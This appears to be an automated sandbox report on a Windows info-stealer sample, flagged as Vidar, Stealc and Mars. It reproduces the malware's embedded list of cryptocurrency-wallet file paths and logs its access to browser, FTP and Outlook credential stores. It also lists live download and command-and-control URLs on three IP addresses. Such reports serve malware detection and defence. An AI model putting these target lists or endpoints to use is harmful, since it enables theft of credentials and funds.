Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cb41bc9329.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1463419 Sample: wqmnYoVbHr.exe Startdate: 27/06/2024 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 16 other signatures 2->59 8 wqmnYoVbHr.exe 37 2->8         started        13 explortu.exe 16 2->13         started        process3 dnsIp4 47 85.28.47.4, 49711, 49731, 80 GES-ASRU Russian Federation 8->47 49 77.91.77.81, 49714, 49729, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->49 35 C:\Users\user\AppData\...\AFHDAKJKFC.exe, PE32 8->35 dropped 37 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->37 dropped 39 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->39 dropped 45 11 other files (7 malicious) 8->45 dropped 77 Detected unpacking (changes PE section rights) 8->77 79 Tries to steal Mail credentials (via file / registry access) 8->79 81 Found many strings related to Crypto-Wallets (likely being stolen) 8->81 89 4 other signatures 8->89 15 cmd.exe 1 8->15         started        17 cmd.exe 2 8->17         started        51 147.45.47.155, 49728, 49730, 49733 FREE-NET-ASFREEnetEU Russian Federation 13->51 41 C:\Users\user\AppData\...\cb41bc9329.exe, PE32 13->41 dropped 43 C:\Users\user\AppData\Local\...\random[1].exe, PE32 13->43 dropped 83 Hides threads from debuggers 13->83 85 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->85 87 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->87 19 cb41bc9329.exe 12 13->19         started        file5 signatures6 process7 signatures8 22 AFHDAKJKFC.exe 4 15->22         started        26 conhost.exe 15->26         started        28 conhost.exe 17->28         started        61 Antivirus detection for dropped file 19->61 63 Multi AV Scanner detection for dropped file 19->63 65 Detected unpacking (changes PE section rights) 19->65 67 2 other signatures 19->67 process9 file10 33 C:\Users\user\AppData\Local\...\explortu.exe, PE32 22->33 dropped 69 Antivirus detection for dropped file 22->69 71 Detected unpacking (changes PE section rights) 22->71 73 Machine Learning detection for dropped file 22->73 75 6 other signatures 22->75 30 explortu.exe 22->30         started        signatures11 process12 signatures13 91 Antivirus detection for dropped file 30->91 93 Detected unpacking (changes PE section rights) 30->93 95 Tries to detect sandboxes and other dynamic analysis tools (window names) 30->95 97 5 other signatures 30->97
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.45.47.155
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • 27%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://147.45.47.155/ku4Nor9/index.php true
  • 21%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • 21%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown